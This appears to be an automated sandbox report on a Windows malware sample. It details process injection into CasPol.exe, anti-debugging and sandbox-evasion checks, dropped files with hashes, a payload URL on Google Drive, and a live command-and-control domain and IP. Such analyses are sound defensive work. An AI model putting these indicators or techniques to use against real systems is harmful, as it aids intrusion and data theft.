            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B69DC3 mov eax, dword ptr fs:[00000030h] 1_2_02B69DC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Process queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B80EBA LdrLoadDll,1_2_02B80EBA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 1100000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
            Source: CasPol.exe, 0000000A.00000003.30403973152.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.30302030860.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29299424561.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Program Manager.NET\Framework\v2.0.50727\en\SurveillanceExClientPlugin.resources\SurveillanceExClientPlugin.resources.EXE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B66C0A cpuid 1_2_02B66C0A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (221) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (112) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Clipboard Data (1) | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (131) | Security Account Manager | Virtualization/Sandbox Evasion (131) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (112) | LSA Secrets | File and Directory Discovery (3) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (113) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories (1) | Cached Domain Credentials | System Information Discovery (15) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (1) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Source | Detection | Scanner | Label
            SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe | 7% | ReversingLabs | Win32.Downloader.Minix

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe | 3% | ReversingLabs |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe | 0% | Virustotal |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe | 3% | Metadefender |
            C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll | 0% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll | 1% | Virustotal |
            C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll | 4% | Metadefender |

            No Antivirus matches

            Source | Detection | Scanner | Label
            mastersure042.duckdns.org | 1% | Virustotal |

            No Antivirus matches

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            mastersure042.duckdns.org | 91.193.75.140 | true | true | | unknown
            drive.google.com | 142.250.186.78 | true | false | | high
            googlehosted.l.googleusercontent.com | 172.217.16.193 | true | false | | high
            doc-10-90-docs.googleusercontent.com | unknown | unknown | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 | false | | high

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://doc-10-90-docs.googleusercontent.com/7 | CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8d | CasPol.exe, 0000000A.00000003.29242029782.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29237253452.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542976844.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29541952931.000000000149C000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe | false | | high
            https://doc-10-90-docs.googleusercontent.com/ | CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | false | | high

            IP | Domain | Country | ASN | ASN Name | Malicious
            91.193.75.140 | mastersure042.duckdns.org | Serbia | 209623 | DAVID_CRAIGGG | true
            142.250.186.78 | drive.google.com | United States | 15169 | GOOGLEUS | false
            172.217.16.193 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false

            IP
            127.0.0.1

                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:736731
                            Start date and time:2022-11-03 07:19:30 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 17s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal84.troj.evad.winEXE@4/7@23/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 23.9% (good quality ratio 23.4%)
                            • Quality average: 87.9%
                            • Quality standard deviation: 21.6%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 62
                            • Number of non-executed functions: 85
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ecs.office.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            Time | Type | Description
                            07:22:08 | API Interceptor | 4044x Sleep call for process: CasPol.exe modified
                            No context
                            No context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe
                            • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious
                            • Filename: s9kIU8A6sJ.exe, Detection: malicious
                            C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll
                            • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious
                            • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious
                            • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious
                            • Filename: Scombrid.exe, Detection: malicious
                            • Filename: Buffone.exe, Detection: malicious
                            • Filename: Conferring.exe, Detection: malicious
                            • Filename: Scombrid.exe, Detection: malicious
                            • Filename: Buffone.exe, Detection: malicious
                            • Filename: Conferring.exe, Detection: malicious
                            • Filename: Sdladnes.exe, Detection: malicious
                            • Filename: Ichthyologic.exe, Detection: malicious
                            • Filename: Fuliginousness.exe, Detection: malicious
                            • Filename: Ichthyologic.exe, Detection: malicious
                            • Filename: Fuliginousness.exe, Detection: malicious
                            • Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious
                            • Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious
                            • Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious
                            • Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious
                            • Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious
                            • Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):29009
                                                                        Entropy (8bit):7.992971996572874
                                                                        Encrypted:true
                                                                        SSDEEP:768:NTG4pBCkWRRNsNBaAYbI3dQT/tJWqX7THfFO4PaSmUZeNue11f:NS4pBbWRR6NBa9E3dI/WqrbFLPa2U31N
                                                                        MD5:3165628E559E4C71AD58389A882A44C7
                                                                        SHA1:65DB3BC9931B59BAB3B49BC0A383873D9503EAD2
                                                                        SHA-256:E6F69E5ED26145EB0B9AD53FF02752578D16A1D6E340ED9B341132EFBEFF9A34
                                                                        SHA-512:CBE8C725E73CBD7819483B094824861533CC2338CEA3B25674D03C00D8F153716C5920E8E8A88192C8808F9FC16672D1674672397C541866827E3BC30083E1DF
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):1159
                                                                        Entropy (8bit):4.771334618443714
                                                                        Encrypted:false
                                                                        SSDEEP:24:t4Col+1ecdmaT7C7vPHqouTMT3X+E744AeWrGMwU0CICx:QcdmaT7C7nqoqg3uE744Ae3MwUNx
                                                                        MD5:6ABC1ECB25C92CFDB963EA764BA01B00
                                                                        SHA1:2DD0D27B47EE7C77D4FFF4BA069804666214C462
                                                                        SHA-256:6F263C116AEB1C8B9CC2B58CB717087C08D3D70D7B4F39A79BE108DC454385F5
                                                                        SHA-512:C9457DCC24D6AAB73C2F813CEE9218777813CDEE438790ACBBAAD7CCDB04538045E3CE78762F2200CE390396534E3E9D5E668148A1EA961E21006E3465BA1735
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16.009"><g fill="#2e3436"><path d="M8.062.01c-.454.049-.883.22-1.25.5C6.324.88 6 1.463 6 2.196a.52.52 0 00.5.507.52.52 0 00.5-.507c0-.45.172-.704.437-.907.266-.202.664-.3 1.063-.28.399.018.784.153 1.062.405.279.253.47.585.47 1.125 0 2.166 1.463 3.51 3 3.47.856-.023 1.687-.478 2.25-1.313l-.563-1c-.376.915-1.068 1.295-1.719 1.312-.96.025-1.969-.73-1.969-2.469 0-.792-.337-1.443-.812-1.875C9.743.235 9.138.038 8.53.01c-.151-.007-.317-.016-.469 0zM15 1.977v.156l.781 1.375c.012-.04.021-.083.031-.125zm0 .375c-.006.106-.02.214-.031.312l.719 1.22c.023-.063.041-.123.062-.188zm-.063.5c-.013.09-.044.166-.062.25l.656 1.125c.03-.061.067-.124.094-.188zm-.093.437c-.024.09-.066.17-.094.25l.594 1.032c.04-.066.088-.119.125-.188z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible"/><
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):409720
                                                                        Entropy (8bit):6.608973549518863
                                                                        Encrypted:false
                                                                        SSDEEP:12288:DTWCBabqAS+XjHeOudiXDfoSzc52jHLiinD0XbFITkk:uRvS+XjHFudyPHf0Xbmok
                                                                        MD5:20AE886E07C3A21B187823EF2367E5FC
                                                                        SHA1:8E217654DB7EBD99040EEB5387E0EE1A03DEE4F1
                                                                        SHA-256:AD4485A9D7A7DE8A78B183B820E932E44DBFF11AF7D584005351878E35146458
                                                                        SHA-512:ECC1C4588E5DD4004712D9F6AEAC1CBFB2BFA5258899878878AB9C47676D9306A4FD4D92E8594B7DCB7F07A65673923144992C3618979F69146755CA02E13F73
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                        Joe Sandbox View:
                                                                        • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious, Browse
                                                                        • Filename: s9kIU8A6sJ.exe, Detection: malicious, Browse
                                                                        Reputation:low
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................R...........f.......p....@..............................................@...............................&.......2...........(..x.... ...X..................................................H................................text....I.......J.................. ..`.itext.......`.......N.............. ..`.data...4....p.......V..............@....bss.....5...........r...................idata...&.......(...r..............@....tls....4................................rdata..............................@..@.reloc...X... ...Z..................@..B.rsrc....2.......2..................@..@.....................(..............@..@................................................................................................
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):154398
                                                                        Entropy (8bit):7.20503336878212
                                                                        Encrypted:false
                                                                        SSDEEP:3072:js12w2Uq479uSd9iXb8FERFfW3093Qre84GFkRMG4vihP:02w27Ku+iwy9Ytur4vsP
                                                                        MD5:1E6F0B6A7479BC35ABB19BEC8A6C66FF
                                                                        SHA1:F85A912925B345EF073A6E6BDBAD5099FC777F79
                                                                        SHA-256:A5029F422FEA64C4C7DF6ACC6EF04AAB4D93E5C72C1572B8FDD9621278532E03
                                                                        SHA-512:8C7D29BD13B3AC980AF4D9841F667D157A1F7EFFA7CBAE164CE867A87D5C1EA05A2558864D595ACD57B4594ED02211942188371C21C09B86129551905513BCD6
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11776
                                                                        Entropy (8bit):5.659384359264642
                                                                        Encrypted:false
                                                                        SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                        MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                        SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                        SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                        SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                                        • Antivirus: Metadefender, Detection: 4%, Browse
                                                                        Joe Sandbox View:
                                                                        • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious, Browse
                                                                        • Filename: Scombrid.exe, Detection: malicious, Browse
                                                                        • Filename: Buffone.exe, Detection: malicious, Browse
                                                                        • Filename: Conferring.exe, Detection: malicious, Browse
                                                                        • Filename: Scombrid.exe, Detection: malicious, Browse
                                                                        • Filename: Buffone.exe, Detection: malicious, Browse
                                                                        • Filename: Conferring.exe, Detection: malicious, Browse
                                                                        • Filename: Sdladnes.exe, Detection: malicious, Browse
                                                                        • Filename: Ichthyologic.exe, Detection: malicious, Browse
                                                                        • Filename: Fuliginousness.exe, Detection: malicious, Browse
                                                                        • Filename: Ichthyologic.exe, Detection: malicious, Browse
                                                                        • Filename: Fuliginousness.exe, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious, Browse
                                                                        • Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious, Browse
                                                                        • Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious, Browse
                                                                        • Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious, Browse
                                                                        • Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                        File Type:PGP Secret Sub-key -
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):3.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:0St:pt
                                                                        MD5:B9A99DD89B2B74FA3D0DB489A9441F60
                                                                        SHA1:D10A9398FC0186720F25C85406C9162F1AF53C27
                                                                        SHA-256:F107BEC012DA220E92554B8801535F7FA92C949C7E2DBB4E588B80F7A723466C
                                                                        SHA-512:22975136BDB95133318A25BDFC5AAB82EB592ACBE56B01418A2EBD0225E8933D89D7AD164153C2CB27DB32402021D2C3DFC81D9B1AE3F5ABDE629CAE203DE0FF
                                                                        Malicious:true
                                                                        Preview:.E..l..H
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):1648
                                                                        Entropy (8bit):3.085836381315963
                                                                        Encrypted:false
                                                                        SSDEEP:24:8i6/rWLgD4/BOmRCBecGlodQAC+eTv/8AdizZwa/kjJT:8ZCgDsvRCLGloPCLEKiNwswT
                                                                        MD5:394618606785FD3F683F7A6ADA540F44
                                                                        SHA1:5B60259981F74037841F4B5196D732AD0FF570AB
                                                                        SHA-256:3148C86B36AF9B4F40E97D7FAB519A883B07B3D9D55F619ED07E22B16233C266
                                                                        SHA-512:1ED6603DF13D09981A761CCDEADCAA514BC83683107FE2D6A814306FD973B52522C2160EE56AAE524DE32CDF83718CFC68564D0C2C836BEDFE7F8FE8CE5D6DD6
                                                                        Malicious:false
                                                                        Preview:L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....b.1...........Stripteased.H............................................S.t.r.i.p.t.e.a.s.e.d.....h.1...........Thysanopteron.L............................................T.h.y.s.a.n.o.p.t.e.r.o.n.....n.1...........Rektifikationen.P.................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.683733070429602
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        File size:531480
                                                                        MD5:5f570885a22cf0a74ca454ea710bcd2e
                                                                        SHA1:82e8aa91a64dd2e0f1c18317518e9e2914387967
                                                                        SHA256:a1dbe6c38c03059bd197cde9e455e03875c32dd034cc6c229c4c62b2d1753eaf
                                                                        SHA512:0b5ab3698c43d3fe69375b5cd6c48853fc2069f693da1858eacba79db4afbae51624292b4acc311fe76f267e832dfc05062a5776a26f65c08590ae5138ef60b9
                                                                        SSDEEP:12288:tOHcKlaPVnLmr22GAsKK/tLOsQ/2V82BKZ70EHH:tgcKliVar22GCMtPymQH
                                                                        TLSH:8DB4F290FB91C4D2EDB503B85E77DCF129ABBD7D70B0420D224A39696AB3352106F94B
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........
                                                                        Icon Hash:74e8c4ccdcccc0e8
                                                                        Entrypoint:0x403373
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                        Signature Valid:false
                                                                        Signature Issuer:OU="truts Femetagershuset Strangulerendes ", E=Placeringsmssigt@Aiders.Ba, O=Skvadre, L=Tullygally, S=Northern Ireland, C=GB
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 02/11/2022 23:29:41 01/11/2025 23:29:41
                                                                        Subject Chain
                                                                        • OU="truts Femetagershuset Strangulerendes ", E=Placeringsmssigt@Aiders.Ba, O=Skvadre, L=Tullygally, S=Northern Ireland, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:8D20C24B85839068FFE77A9B0E43442A
                                                                        Thumbprint SHA-1:510509682B2BB050F41F78498A1B87F673D0540D
                                                                        Thumbprint SHA-256:58D9F4474CF9AC7B148864CF2DC476F50AD1C3B094EC4A93D61BF46D8E2C617F
                                                                        Serial:FCD368E4C01BC4FC
                                                                        Instruction
                                                                        sub esp, 000002D4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        push 00000020h
                                                                        pop edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+14h], ebx
                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                        mov dword ptr [esp+1Ch], ebx
                                                                        call dword ptr [004080A8h]
                                                                        call dword ptr [004080A4h]
                                                                        and eax, BFFFFFFFh
                                                                        cmp ax, 00000006h
                                                                        mov dword ptr [00434EECh], eax
                                                                        je 00007F32F432E0A3h
                                                                        push ebx
                                                                        call 00007F32F4331339h
                                                                        cmp eax, ebx
                                                                        je 00007F32F432E099h
                                                                        push 00000C00h
                                                                        call eax
                                                                        mov esi, 004082B0h
                                                                        push esi
                                                                        call 00007F32F43312B3h
                                                                        push esi
                                                                        call dword ptr [00408150h]
                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                        cmp byte ptr [esi], 00000000h
                                                                        jne 00007F32F432E07Ch
                                                                        push 0000000Ah
                                                                        call 00007F32F433130Ch
                                                                        push 00000008h
                                                                        call 00007F32F4331305h
                                                                        push 00000006h
                                                                        mov dword ptr [00434EE4h], eax
                                                                        call 00007F32F43312F9h
                                                                        cmp eax, ebx
                                                                        je 00007F32F432E0A1h
                                                                        push 0000001Eh
                                                                        call eax
                                                                        test eax, eax
                                                                        je 00007F32F432E099h
                                                                        or byte ptr [00434EEFh], 00000040h
                                                                        push ebp
                                                                        call dword ptr [00408044h]
                                                                        push ebx
                                                                        call dword ptr [004082A0h]
                                                                        mov dword ptr [00434FB8h], eax
                                                                        push ebx
                                                                        lea eax, dword ptr [esp+34h]
                                                                        push 000002B4h
                                                                        push eax
                                                                        push ebx
                                                                        push 0042B208h
                                                                        call dword ptr [00408188h]
                                                                        push 0040A2C8h
                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
